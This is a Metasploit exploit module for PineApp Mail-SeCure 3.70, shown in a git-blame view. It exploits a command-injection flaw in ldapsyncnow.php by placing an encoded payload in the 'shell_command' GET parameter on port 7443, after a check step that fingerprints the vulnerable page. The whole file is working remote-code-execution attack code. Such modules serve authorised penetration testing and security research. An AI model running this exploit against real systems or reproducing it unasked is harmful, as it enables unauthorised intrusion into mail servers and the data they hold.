Files
metasploit-gs/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

98 lines
2.7 KiB
Ruby
Raw Normal View History

2013-07-27 12:12:06 -05:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
2013-07-27 12:12:06 -05:00
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2013-07-27 12:12:06 -05:00
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
2025-06-20 13:20:44 +01:00
super(
update_info(
info,
'Name' => 'PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution',
'Description' => %q{
2013-07-27 12:12:06 -05:00
This module exploits a command injection vulnerability on PineApp Mail-SeCure
2025-06-20 13:20:44 +01:00
3.70. The vulnerability exists on the ldapsyncnow.php component, due to the insecure
usage of the shell_exec() php function. This module has been tested successfully
on PineApp Mail-SeCure 3.70.
},
'Author' => [
2013-07-27 12:12:06 -05:00
'Dave Weinstein', # Vulnerability discovery
2025-06-20 13:20:44 +01:00
'juan vazquez' # Metasploit module
2013-07-27 12:12:06 -05:00
],
2025-06-20 13:20:44 +01:00
'License' => MSF_LICENSE,
'References' => [
2013-10-21 15:07:07 -05:00
[ 'ZDI', '13-185' ],
[ 'OSVDB', '95781' ]
2013-07-27 12:12:06 -05:00
],
2025-06-20 13:20:44 +01:00
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' => {
'Space' => 1024,
2013-07-27 12:12:06 -05:00
'DisableNops' => true,
2025-06-20 13:20:44 +01:00
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl python telnet'
}
2013-07-27 12:12:06 -05:00
},
2025-06-20 13:20:44 +01:00
'Targets' => [
[ 'PineApp Mail-SeCure 3.70', {}]
2013-07-27 12:12:06 -05:00
],
2025-06-20 13:20:44 +01:00
'DefaultOptions' => {
2013-07-27 12:12:06 -05:00
'SSL' => true
},
2025-06-20 13:20:44 +01:00
'DefaultTarget' => 0,
'DisclosureDate' => '2013-07-26',
'Notes' => {
2025-06-23 12:43:46 +01:00
'Reliability' => UNKNOWN_RELIABILITY,
'Stability' => UNKNOWN_STABILITY,
'SideEffects' => UNKNOWN_SIDE_EFFECTS
}
2025-06-20 13:20:44 +01:00
)
)
2013-07-27 12:12:06 -05:00
register_options(
[
Opt::RPORT(7443)
],
self.class
)
end
def my_uri
return normalize_uri("/admin/ldapsyncnow.php")
end
def check
# Since atm of writing this exploit there isn't patch available,
# checking for the vulnerable component should be a reliable test.
res = send_request_cgi({
'uri' => my_uri,
'vars_get' => {
2025-06-20 13:20:44 +01:00
'sync_now' => '1'
2013-07-27 12:12:06 -05:00
}
})
if res and res.code == 200 and res.body =~ /window\.setTimeout\('loaded\(\)', 2500\);/
return Exploit::CheckCode::Appears
end
2025-06-20 13:20:44 +01:00
2013-07-27 12:12:06 -05:00
return Exploit::CheckCode::Safe
end
def exploit
print_status("#{rhost}:#{rport} - Executing payload...")
send_request_cgi({
'uri' => my_uri,
'vars_get' => {
2025-06-20 13:20:44 +01:00
'sync_now' => '1', # must be 1 in order to trigger the vulnerability
2013-07-27 12:12:06 -05:00
'shell_command' => payload.encoded
}
})
end
end